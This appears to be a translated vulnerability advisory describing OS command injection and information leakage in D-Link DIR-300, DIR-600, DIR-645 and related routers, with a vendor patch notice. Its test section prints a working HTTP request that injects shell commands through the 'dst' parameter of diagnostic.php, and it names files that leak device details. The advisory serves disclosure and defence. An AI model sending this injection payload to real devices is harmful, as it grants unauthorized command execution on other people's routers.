Multiple D-Link product command injection and Information Leakage Vulnerabilities
Release date:
Updated on:
Affected Systems:
D-Link DIR-300
D-Link DIR-600
D-Link DIR-645
D-Link DIR-110
Description:
--------------------------------------------------------------------------------
Bugtraq id: 58938
D-Link is a world-renowned provider of network devices and solutions. Its products include a variety of router devices.
DIR-600/DIR-300 revB/DIR-815/DIR-645/DIR-412/DIR-456 there are multiple security vulnerabilities in implementation that can be exploited by attackers to obtain sensitive information and execute arbitrary commands in the affected device.
1. OS command injection
Due to the absence of input verification and session verification for dst parameters, arbitrary shell commands can be injected and executed.
2. Information Leakage
Some server banner can easily detect certain types of devices.
3. Information Leakage
You can obtain detailed device information through the network.
<* Source: m-1-k-3
Link: http://cxsecurity.com/issue/WLB-2013040062
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
POST/diagnostic. php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 16.0) Gecko/20100101 Firefox/16.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: de-de, de; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset = UTF-8
Referer: http: // xxxx/
Content-Length: 41
Cookie: uid = hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache
Act = ping & amp; dst = % 26% 20 COMMAND % 26
Http://www.example.com/DevInfo.txt or http://www.example.com/version.txt
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
D-Link
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.dlink.com/